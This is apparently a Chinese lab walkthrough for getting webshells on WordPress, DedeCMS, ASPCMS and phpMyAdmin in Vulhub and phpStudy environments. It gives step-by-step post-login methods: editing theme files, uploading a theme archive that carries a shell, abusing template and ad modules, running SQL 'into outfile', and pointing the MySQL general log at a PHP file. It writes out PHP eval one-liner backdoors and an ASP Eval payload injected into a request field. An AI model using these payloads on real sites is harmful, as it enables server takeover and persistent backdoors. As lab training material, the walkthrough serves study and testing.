WordPress
进⼊Vulhub靶场并执⾏以下命令开启靶场;在浏览器中访问并安装好....
cd /vulhub/wordpress/pwnscriptum
docker-compose up -d首先访问网站 给他设置一个中文:
安装:
进入后台:
思路一: 修改其WP的模板写⼊⼀句话⽊⻢后⻔并访问其⽂件即可GetShell;登陆WP后点击 【外 观】 ->【编辑】 -> 404.php
点击更新文件:
访问路径 /wp-content/themes/twentyfifteen/404.php
成功!
思路二:上传主题拿WebShell
首先下载一个 wordpress的主题模版:
主题是个压缩包 将写好的木马1.php->弄到压缩包里面
<?php phpinfo();eval($_POST['cmd']);?>
上传这个主题:
点击->外观->主题->添加->上传主题->浏览->现在安装
访问路径:
/wp-content/themes/generatepress/1.php
蚁剑连接:
dedecms
安装dedecms:
phpstudy安装网站:
安装成功!
方式一:通过⽂件管理器上传WebShell
进入后台:
上传木马文件 1.php
访问
蚁剑连接:
方式二:修改模板⽂件拿WebShell
模版->默认模版管理->index.htm->修改
修改->写入木马代码
点击->生成->更新主页html->修改php->生成静态->跟新主页
成功:
蚁剑连接:
方式三:后台任意命令执⾏拿WebShell
模块->广告管理->增加一个新广告
广告内容中 填写木马:
确定之后->点击->代码
就可以看到广告路径啦:
方式四:sql拿webshell
写上:
select "<?php @eval($_POST['cmd']);?>" into outfile G:/Soft/phpStudy/PHPTutorial/WWW/1.php
访问:
ASPCMS
登录后台:
点击->扩展功能->幻灯片设置->保存(抓包)
在抓取的数据包中修改 slideTextStatus 字段的值:
1%25><%25Eval(Request (chr(65)))%25><%25连接密码是: a
访问:/config//AspCms_Config.asp
phpadmin
方式一:通过⽇志⽂件拿Shell
查看日志保存状态:
show global variables like '%general%';
设置日志保存状态开启:
set global general_log='on';
再次查看日志保存状态:
show global variables like '%general%';
查看网站更目录:
show global variables like '%general%';
修改日志保存位置:
set global general_log_file = 'D:/Develop/phpstudy_pro/WWW/123.php'访问123.php:
尝试 写入木马到日志:
蚁剑连接:
方式二:导⼊导出拿WebShell
通过SQL语句拿webshell ⽤ into outfile 把后⻔写到⽹站⽬录上。
首先判断位置:
select @@datadir
Extensions和www目录同级
网站web路径为: D:/Develop/phpstudy_pro/WWW
webshell:
select "<?php @eval($_POST['cmd']);?>" into outfile 'D:/Develop/phpstudy_pro/WWW/abc.php';
访问abc.php:
蚁剑连接:
方式三:界面图像化GetShell
如果这个过滤了 into outfile :
可以看到日志保存的路径
返回SQL 执行:
select "<?php @eval($_POST['cmd']);?>" 和方式一 方法一样!
8419
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
